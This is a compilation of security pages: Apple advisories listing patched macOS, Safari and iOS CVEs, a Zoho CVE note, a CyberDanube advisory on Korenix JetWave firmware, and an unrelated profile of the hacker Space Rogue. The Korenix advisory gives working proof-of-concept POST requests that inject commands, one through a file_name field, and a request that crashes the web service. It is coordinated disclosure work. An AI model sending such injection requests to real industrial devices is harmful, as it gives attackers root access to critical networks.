This issue was addressed with improved checks. This issue is fixed in macOS Monterey 12.6.1, macOS Big Sur 11.7.1. A remote user may be able to write arbitrary files.

Released October 24, 2022

**AppleMobileFileIntegrity**

Available for: macOS Monterey

Impact: An app may be able to modify protected parts of the file system

Description: This issue was addressed by removing additional entitlements.

CVE-2022-42825: Mickey Jin (@patch1t)

**Audio**

Available for: macOS Monterey

Impact: Parsing a maliciously crafted audio file may lead to disclosure of user information 

Description: The issue was addressed with improved memory handling. 

CVE-2022-42798: Anonymous working with Trend Micro Zero Day Initiative

Entry added October 27, 2022

**Calendar**

Available for: macOS Monterey

Impact: A remote user may be able to write arbitrary files

Description: This issue was addressed with improved checks.

CVE-2022-46723: Mikko Kenttälä (@Turmio\_) of SensorFu

Entry added February 20, 2023

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved state management. 

CVE-2022-32944: Tim Michaud (@TimGMichaud) of Moveworks.ai

Entry added October 27, 2022

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges 

Description: A race condition was addressed with improved locking. 

CVE-2022-42803: Xinru Chi of Pangu Lab, John Aakerblom (@jaakerblom)

Entry added October 27, 2022

**Kernel**

Available for: macOS Monterey

Impact: An app may be able to execute arbitrary code with kernel privileges 

Description: A logic issue was addressed with improved checks. 

CVE-2022-42801: Ian Beer of Google Project Zero

Entry added October 27, 2022

**PackageKit**

Available for: macOS Monterey

Impact: An app may be able to modify protected parts of the file system

Description: A race condition was addressed with additional validation.

CVE-2022-46713: Mickey Jin (@patch1t) of Trend Micro

Entry added February 20, 2023

**ppp**

Available for: macOS Monterey

Impact: A buffer overflow may result in arbitrary code execution

Description: The issue was addressed with improved bounds checks. 

CVE-2022-32941: an anonymous researcher

Entry added October 27, 2022

**Ruby**

Available for: macOS Monterey

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: A memory corruption issue was addressed by updating Ruby to version 2.6.10.

CVE-2022-28739

**Sandbox**

Available for: macOS Monterey

Impact: An app with root privileges may be able to access private information

Description: This issue was addressed with improved data protection.

CVE-2022-32862: an anonymous researcher

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A type confusion issue was addressed with improved memory handling.

WebKit Bugzilla: 244622  
CVE-2022-42823: Dohyun Lee (@l33d0hyun) of SSD Labs

Entry added December 22, 2022

**zlib**

Available for: macOS Monterey

Impact: A user may be able to cause unexpected app termination or arbitrary code execution 

Description: This issue was addressed with improved checks.

CVE-2022-37434: Evgeny Legerov

CVE-2022-42800: Evgeny Legerov

Entry added October 27, 2022

CVE-2022-46723: About the security content of macOS Monterey 12.6.1

The issue was addressed with improved UI handling. This issue is fixed in Safari 15.6, iOS 15.6 and iPadOS 15.6. Visiting a maliciously crafted website may leak sensitive data.

Released July 20, 2022

**Safari Extensions**

Available for: macOS Big Sur and macOS Catalina

Impact: Visiting a maliciously crafted website may leak sensitive data

Description: The issue was addressed with improved UI handling.

CVE-2022-32784: Young Min Kim of CompSec Lab at Seoul National University

**WebKit**

Available for: macOS Big Sur and macOS Catalina

Impact: A user may be tracked through their IP address

Description: A logic issue was addressed with improved state management.

CVE-2022-32861: Matthias Keller (m-keller.com)

Entry added September 16, 2022

**WebKit**

Available for: macOS Big Sur and macOS Catalina

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-32863: P1umer, afang5472, xmzyshypnc

Entry added September 16, 2022

**WebKit**

Available for: macOS Big Sur and macOS Catalina

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: An out-of-bounds write issue was addressed with improved input validation.

WebKit Bugzilla: 240720  
CVE-2022-32792: Manfred Paul (@\_manfp) working with Trend Micro Zero Day Initiative

**WebRTC**

Available for: macOS Big Sur and macOS Catalina

Impact: Processing maliciously crafted web content may lead to arbitrary code execution.

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 242339  
CVE-2022-2294: Jan Vojtesek of Avast Threat Intelligence team

CVE-2022-32784: About the security content of Safari 15.6

A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. A malicious application may be able to leak sensitive user information.

Released March 14, 2022

**Accelerate Framework**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-22633: ryuzaki

Entry updated May 25, 2022

**AppleAVD**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22666: Marc Schoenefeld, Dr. rer. nat.

**AVEVideoEncoder**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2022-22634: an anonymous researcher

**AVEVideoEncoder**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22635: an anonymous researcher

**AVEVideoEncoder**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22636: an anonymous researcher

**Cellular**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access may be able to view and modify the carrier account information and settings from the lock screen

Description: The GSMA authentication panel could be presented on the lock screen. The issue was resolved by requiring device unlock to interact with the GSMA authentication panel.

CVE-2022-22652: Kağan Eğlence (linkedin.com/in/kaganeglence), Oğuz Kırat (@oguzkirat)

Entry updated May 25, 2022

**CoreMedia**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to learn information about the current camera view before being granted camera access

Description: An issue with app access to camera metadata was addressed with improved logic.

CVE-2022-22598: Will Blaschko of Team Quasko

**CoreTypes**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may bypass Gatekeeper checks

Description: This issue was addressed with improved checks to prevent unauthorized actions.

CVE-2022-22663: Arsenii Kostromin (0x3c3e)

Entry added May 25, 2022

**FaceTime**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may be able to bypass the Emergency SOS passcode prompt

Description: This issue was addressed with improved checks.

CVE-2022-22642: Yicong Ding (@AntonioDing)

**FaceTime**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may send audio and video in a FaceTime call without knowing that they have done so

Description: This issue was addressed with improved checks.

CVE-2022-22643: Sonali Luthar of the University of Virginia, Michael Liao of the University of Illinois at Urbana-Champaign, Rohan Pahwa of Rutgers University, and Bao Nguyen of the University of Florida

**GPU Drivers**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22667: Justin Sherman of the University of Maryland, Baltimore County

**ImageIO**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22611: Xingyu Jin of Google

**ImageIO**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-22612: Xingyu Jin of Google

**IOGPUFamily**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to gain elevated privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22641: Mohamed Ghannam (@\_simo36)

**iTunes**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious website may be able to access information about the user and their devices

Description: A logic issue was addressed with improved restrictions.

CVE-2022-22653: Aymeric Chaib of CERT Banque de France

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22596: an anonymous researcher

CVE-2022-22640: sqrtpwn

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22613: Alex, an anonymous researcher

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22614: an anonymous researcher

CVE-2022-22615: an anonymous researcher

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to elevate privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22632: Keegan Saunders

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An attacker in a privileged position may be able to perform a denial of service attack

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-22638: derrek (@derrekr6)

**libarchive**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Multiple issues in libarchive

Description: Multiple memory corruption issues existed in libarchive. These issues were addressed with improved input validation.

CVE-2021-36976

**LLVM**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to delete files for which it does not have permission

Description: A race condition was addressed with additional validation.

CVE-2022-21658: Florian Weimer (@fweimer)

Entry added May 25, 2022

**Markup**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions

Description: This issue was addressed with improved checks.

CVE-2022-22622: Ingyu Lim (@\_kanarena)

**MediaRemote**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to identify what other applications a user has installed

Description: An access issue was addressed with improved access restrictions.

CVE-2022-22670: Brandon Azad

**MobileAccessoryUpdater**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2022-22672: Siddharth Aeri (@b1n4r1b01)

Entry added May 25, 2022

**NetworkExtension**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An attacker in a privileged network position may be able to leak sensitive user information

Description: A logic issue was addressed with improved state management.

CVE-2022-22659: George Chen Kaidi of PayPal

Entry updated May 25, 2022

**Phone**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may be able to bypass the Emergency SOS passcode prompt

Description: This issue was addressed with improved checks.

CVE-2022-22618: Yicong Ding (@AntonioDing)

**Preferences**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to read other applications' settings

Description: The issue was addressed with additional permissions checks.

CVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**Sandbox**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to bypass certain Privacy preferences

Description: The issue was addressed with improved permissions logic.

CVE-2022-22600: Sudhakar Muthumani (@sudhakarmuthu04) of Primefort Private Limited, Khiem Tran

Entry updated May 25, 2022

**Siri**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen

Description: A permissions issue was addressed with improved validation.

CVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg-/)

Entry updated May 25, 2022

**SoftwareUpdate**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22639: Mickey (@patch1t)

**UIKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions

Description: This issue was addressed with improved checks.

CVE-2022-22621: Joey Hewitt

**VoiceOver**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to an iOS device may be able to access photos from the lock screen

Description: An authentication issue was addressed with improved state management.

CVE-2022-22671: videosdebarraquito

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A cookie management issue was addressed with improved state management.

WebKit Bugzilla: 232748  
CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 232812  
CVE-2022-22610: Quan Yin of Bigo Technology Live Client Team

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 233172  
CVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

WebKit Bugzilla: 234147  
CVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 234966  
CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious website may cause unexpected cross-origin behavior

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 235294  
CVE-2022-22637: Tom McKee of Google

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to leak sensitive user information

Description: A logic issue was addressed with improved restrictions.

CVE-2022-22668: MrPhil17

Entry added May 25, 2022

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to leak sensitive user information

Description: A logic issue was addressed with improved restrictions.

CVE-2022-22668: MrPhil17

CVE-2022-22668: About the security content of iOS 15.4 and iPadOS 15.4

Zoho ManageEngine Desktop Central and Desktop Central MSP before 10.1.2137.2 allow directory traversal via computerName to AgentLogUploadServlet. A remote, authenticated attacker could upload arbitrary code that would be executed when Desktop Central is restarted. (The attacker could authenticate by exploiting CVE-2021-44515.)

CVE-2022-48362: ZohOwned :: A Critical Authentication Bypass on Zoho ManageEngine Desktop Central

Korenix JetWave 4200 Series 1.3.0 and JetWave 3200 Series 1.6.0 are vulnerable to Denial of Service via /goform/formDefault.

**Title**: Multiple Vulnerabilities  
**Product**: JetWave4221 HP-E, JetWave 2212G, JetWave 2212X/2212S, JetWave 2211C, JetWave 2411/2111, JetWave 2411L/2111L, JetWave 2414/2114, JetWave 2424, JetWave 2460, JetWave 3220/3420 V3  
**Vulnerable version**: See “Vulnerable Versions”  
**Fixed version**: See “Solution”  
**CVE**: CVE-2023-23294, CVE-2023-23295, CVE-2023-23296  
**Impact**: High  
**Homepage**: https://korenix.com  
**Found**: 2022-11-28

_Multiple JetWave products from Korenix are prone to command injection and denial of service (DoS) vulnerabilities._

**Vendor description**

“Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions.  
\[…\]  
Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, andTransportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners.”

Source:  
https://www.korenix.com/en/about/index.aspx?kind=3

**Vulnerable versions**

The following firmware versions have been found to be vulnerable by CyberDanube:

*   Korenix JetWave4221 HP-E <= V1.3.0
*   Korenix JetWave 3220/3420 V3 < V1.7

The following firmware versions have been identified to be vulnerable by the vendor:

*   Korenix JetWave 2212G V1.3.T
*   Korenix JetWave 2212X/2112S V1.3.0
*   Korenix JetWave 2211C < V1.6
*   Korenix JetWave 2411/2111 < V1.5
*   Korenix JetWave 2411L/2111L < V1.6
*   Korenix JetWave 2414/2114 < V1.4
*   Korenix JetWave 2424 < V1.3
*   Korenix JetWave 2460 < V1.6

**Vulnerability overview**

1) Authenticated Command Injection (CVE-2023-23294, CVE-2023-23295)  
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker.

2) Authenticated Denial of Web-Service (CVE-2023-23296)  
When logged in, a user can issue a POST request such that the underlying binary exits. The Web-Service becomes unavailable and cannot be accessed until the device gets rebooted.

**Proof of Concept****1) Authenticated Command Injection**

1.a) – CVE-2023-23294  
The command “touch /tmp/poc” was injected to the system by using the following  
POST request:

POST /goform/formTFTPLoadSave HTTP/1.1  
Host: 172.16.0.38  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 127  
Origin: http://172.16.0.38  
Connection: close  
Referer: http://172.16.0.38/mgmtsaveconf.asp  
Cookie: -common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45  
Upgrade-Insecure-Requests: 1

submit-url=%2Fmgmtsaveconf.asp&ip\_address=192.168.1.1&file\_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp\_action=load&tftp\_config=Submit

The command gets executed as root and a file under the folder /tmp/ is created.

1.b) – CVE-2023-23295  
The command “touch /tmp/poc2” was injected to the system by using the following POST request:

POST /goform/formSysCmd HTTP/1.1  
Host: 172.16.0.38  
Content-Type: application/x-www-form-urlencoded  
Connection: close  
Referer: 172.16.0.38  
Cookie: -common-web-session-=::webs.session::df1307d508d798638a8b4572987462bb  
Content-Length: 40

sysCmd=touch%20/tmp/poc2&submit-url=

The command gets executed as root and a file under the folder /tmp/ is created. Command output is written into /tmp/syscmd.

**2) Authenticated Denial of Web-Service (CVE-2023-23296)**

The process goahead chrashes when the following POST request is sent to the endpoint /goform/formDefault:

POST /goform/formDefault HTTP/1.1  
Host: 172.16.0.38  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 62  
Origin: http://172.16.0.38  
Connection: close  
Referer: http://172.16.0.38/toolping.asp  
Cookie: -common-web-session-=::webs.session::3c624961199904f380e978a3967cc356  
Upgrade-Insecure-Requests: 1

PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping

The output was observed on the terminal using our emulated instance:

rm: invalid option — /  
BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binary  
Usage: rm \[OPTION\]… FILE…

Remove (unlink) the FILE(s). You may use ‘–‘ to  
indicate that all following arguments are non-options.

Options:  
\-i always prompt before removing each destination  
\-f remove existing destinations, never prompt  
\-r or -R remove the contents of directories recursively

killall: wlwatchdog: no process killed  
killall: wlapwatchdog: no process killed

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

**Solution**

Owner of these products are suggested to update to the following versions:

*   Korenix JetWave 4221 HP-E V1.4.0
*   Korenix JetWave 2212G V1.10
*   Korenix JetWave 2212X/2112S V1.11
*   Korenix JetWave 2211C V1.6
*   Korenix JetWave 2411/2111 V1.5
*   Korenix JetWave 2411L/2111L V1.6
*   Korenix JetWave 2414/2114 V1.4
*   Korenix JetWave 2424 V1.3
*   Korenix JetWave 2460 V1.6
*   Korenix JetWave 3220/3420 V3 V1.7

**Workaround****Recommendation**

CyberDanube recommends customers from Korenix to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.

**Contact Timeline**

*   2022-12-05: Contacting Beijer Electronics Group via
*   2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were confirmed by the vendor. The vendor planned to fix the vulnerabilities in the next 1.5 months.
*   2023-01-04: Contact shared the updated firmware version. CyberDanube checked if the vulnerabilities got fixed. The contact communicated that  
    not only JetWave4221 is vulnerable to these issues. Therefore, CyberDanube postponed the release of the Advisory until the other  
    products have been patched.
*   2023-01-30: Meeting with Beijer Electronics. Customer get informed about the issues. Fixes got published. Disclosure date got shifted to 2023-02-13 to provide a time-window for patching.
*   2023-02-13: Coordinated release of security advisory.

**Author**

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points.

CVE-2023-23296: [EN] Multiple Vulnerabilities in Korenix JetWave Series - CyberDanube

Security Pro File: The old-school hacker traces a path from young hardware tinkerer to senior cybersecurity executive.

Before he was Space Rogue, before L0pht, before testifying in front of Congress about what used to be a very unknown risk of networked computers, and before he embarked on a career in cybersecurity, he was just young Cris Thomas with a homemade flashlight.

Growing up in a mobile home in rural Maine in the 1970s, Thomas didn't have a whole lot of access to technology in his early years. But at the tender age of five, armed with a hammer and a worn-out sealed alkaline flashlight — the kind that you threw away after the batteries lost their juice — he was able to first learn the basics of electrical circuits. Cannibalizing parts from those flashlights and adding C and D cell batteries and wires consisting of garbage bag twist ties, he was in business with his very own lighting device.

That kind of tinkering is the very essence of a hacker's modus operandi, and it was the start of his love affair with hacking and his eventual profession as a cybersecurity leader. Over the years, Thomas has done stints at the likes of Trustwave Security, Tenable, and almost six years now at IBM as Global Lead of Policy and Special Initiatives. But at its root his beginnings have all the same flavor of self-directed experimentation and trial-and-error with his flashlight. His route was circuitous and full of ups and downs, but he says that in some ways it was easier for him to go down that path than those trying to get their break in cybersecurity today without the traditional path straight from college.

"There's still people who are trying to break into the industry with little to no formal education, and the debate of college or certifications is still raging. So, I think getting into the industry, from an austere beginning and maybe even skipping the formal education and being self-taught — it is possible," he says. "It's a lot more difficult today, because I think people put a lot of importance on the college degree and the formal education, and so it's hard to get around that stigma."

After early grade school he moved to a bigger town, was exposed to computers in bits and pieces, and mastered the basics of BASIC from chance encounters, clubs, and high school computer class. But it wasn't until he was in the Army that he was able to buy his very own computer, a Mac SE he bought on credit from a store nearby his base. It was from this machine he dug further into programming and got synced up with his first local user group, a Mac HyperCard user group. From there he branched out into BBSs and began to tap into the burgeoning Internet hacker subculture. After the Army and a brief stint at Boston University, he took the handle Space Rogue, dialing into the Boston BBSs. Many of those had a whole underground world of in-person meet-ups attached to them. Running in those circles — plus holding down a job at a local CompUSA where a number of local hackers worked — is what would eventually lead Space Rogue to the ragtag group of hackers called L0pht.

**Remembering the L0pht**

A collective of elite hackers and a hackerspace rolled into one, the L0pht is one of those storied groups that's inextricably tied in with the infancy of the cybersecurity industry. In a book published this month, _Space Rogue: How the Hackers Known as L0pht Changed the World_, Thomas writes the memoir of his winding journey to hacking and his membership in the group.

Space Rogue was one of the earliest members and was heavily involved in the group's adventures and hacking experimentation. He was there for its evolution into what would become L0pht Heavy Industries, its release of the L0phtCrack password-cracking tool, and its eventual sale to @Stake. Together with hackers like Mudge, Weld Pond, Kingpin, Dildog, tan, and Stefan von Neumann, they were on the bleeding edge of experimentation with hardware and software — partially from scavenging corporate dumpsters for equipment, partially from soliciting donations and picking up cool finds at the MIT Flea Market, where they also sold refurbished gear to partially fund their loft space. The crew ran their own NOC, experimenting with different forms of networking, and they shared files online through the early version of the L0pht.com server. Space Rogue ran the popular Whacked Mac Archives, a collection of software collected from underground systems and BBSs over the years. He did the books and paid the bills as an unofficial chief operating officer and was also instrumental in helping raise the profile of the group by founding and running Hacker News Network and helping to coordinate a lot of its work with the media.

The work the L0pht did for a very long time was simply a labor of love — the hackers had day jobs. In their off-hours time of experimentation they started learning how truly vulnerable systems are to manipulation and exploitation in ways unexpected by their creators. As the team evolved, they started picking up gigs writing custom signatures for the first incarnations of intrusion detection systems, issued advisories about vulnerabilities on their website and Bugtraq, and were courted by firms to do pen testing. For a long time they barely broke even, but their security chops did gain the attention of the federal government, and in 1998 Space Rogue and six other core members of the L0pht stepped in front of a Congressional panel to give one of the earliest public warnings about the state of insecurity of the online world.

Thomas does a great job detailing all of these happenings in his book, which offers a very personal and open account of his perspective on how things unfolded. He does a great job highlighting the personalities and mindsets of the different hackers he worked with or came across over the years, and is very relatable and vulnerable offering thoughts on his maturing perspectives on dealing with not just systems but also people. Readers get to follow along with his close connections with hacker friends, fallouts and reconciliations, and run-ins with difficult bosses, as well as career disillusionment and rebirth.

**What's in a Handle?**

Musing about the L0pht and his book recently, he notes that while his unconventional learnings and rise through cybersecurity could probably be emulated by newcomers, the rise of L0pht itself occurred during a very unique era in time and would be a whole heck of a lot more difficult to recreate.

"I mean, you can get a bunch of people together and rent some space and do some stuff, but getting the same attention would be harder because the bugs are harder to find now," he says. He explains that what L0pht did wasn't easy, but they found the low-hanging fruit in security flaws.

They also had a lot less red tape and legal and professional standards to navigate. Doing what they did back in the 1990s today would put most cybersecurity researchers in a lot of hot water.

"There's a lot more risk involved. I mean, there was risk then too, but if you're going to release information about a zero-day vulnerability to the public without a pseudonym, the risk of lawsuits is pretty high. Which is, again, one of the reasons why we were using the handles and the pseudonyms to begin with. But staying pseudonymous is a lot more difficult today than it was."

Thomas still cherishes and uses his Space Rogue handle — it's part of his online and professional persona. For example, his email address at IBM is based on that handle rather than his real name.

"I built a reputation as Space Rogue within the industry. I was the last member of the L0pht to actually start using their given name in professional settings," he says. "So it's only been a few years for me, really, that people have looked at the handle and been able to equate it to the given name easily."

